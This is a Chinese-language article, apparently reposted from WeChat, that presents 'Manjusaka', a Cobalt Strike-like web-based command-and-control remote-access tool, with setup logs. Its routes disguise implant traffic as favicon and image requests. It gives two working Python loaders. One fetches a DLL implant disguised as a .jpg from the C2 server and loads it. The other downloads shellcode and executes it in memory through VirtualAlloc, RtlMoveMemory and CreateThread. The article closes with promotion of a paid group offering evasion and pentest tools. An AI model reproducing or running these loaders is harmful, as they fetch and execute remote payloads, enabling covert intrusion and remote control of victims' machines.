一款基于WEB界面的仿CobaltStrike C2远控。
0x02 安装与使用
1、配置conf.toml 运行主文件
[[email protected] nps]# ./manjusaka[NPS] 2022/09/14 15:57:21 初始用户: manjusaka 密码: ZbFCa2L2LRd5[NPS] 2022/09/14 15:57:21 创建项目: 公共项目 没有归属的npc放在这个项目里面[NPS] 2022/09/14 15:57:21 监听项目路由: VHOS5vqN[NPS] 2022/09/14 15:57:21 NPS监听地址 :3200[NPS] 2022/09/14 15:57:21 NPU后台地址 : manjusaka[NPS] 2022/09/14 15:57:21 NPC监听地址 :801[NPS] 2022/09/14 15:57:21 NPC交互路由 : /:target/favicon.ico[NPS] 2022/09/14 15:57:21 NPC下载路由 : /:target/assert/:sys/bg.jpg[NPS] 2022/09/14 15:57:21 NPC文件路由 : /images/:fid/logo.png
2、访问地址为
http://192.168.93.217:3200/manjusaka3、根据项目 生成npc 可以直接使用exe或elf格式的npc。也可以使用其它语言加载npc母体 比如使用python加载npc母体dll,或者使用shellcode内存加载的形式
import requestsfrom ctypes import cdllres = requests.get("http://192.168.93.217:801/bq1iFEP2/assert/dll/x64/bg.jpg")with open("a.dll","wb") as f:f.write(res.content)cdll.LoadLibrary("a.dll").main()
import requestsimport ctypesshellcode = requests.get("http://192.168.93.217:801/bq1iFEP2/assert/bin/x64/bg.jpg").contentrwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)ctypes.windll.kernel32.RtlMoveMemory(rwxpage, shellcode, len(shellcode))handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)ctypes.windll.kernel32.WaitForSingleObject(handle, -1)
0x03 链接下载
翻到文章最底部点击“阅读原文”下载链接
★
欢 迎 加 入 星 球 !
代码审计+免杀+渗透学习资源+各种资料文档+各种工具+付费会员
进成员内部群
星球的最近主题和星球内部工具一些展示
关 注 有 礼
还在等什么?赶紧点击下方名片关注学习吧!
推荐阅读
文章来源: http://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247501658&idx=1&sn=be4d46ba10450071a13669074b04a4b9&chksm=c1763af5f601b3e34fb6480f2f369071fc85af85179f52592e2ebed921775b69de41f5e37077#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh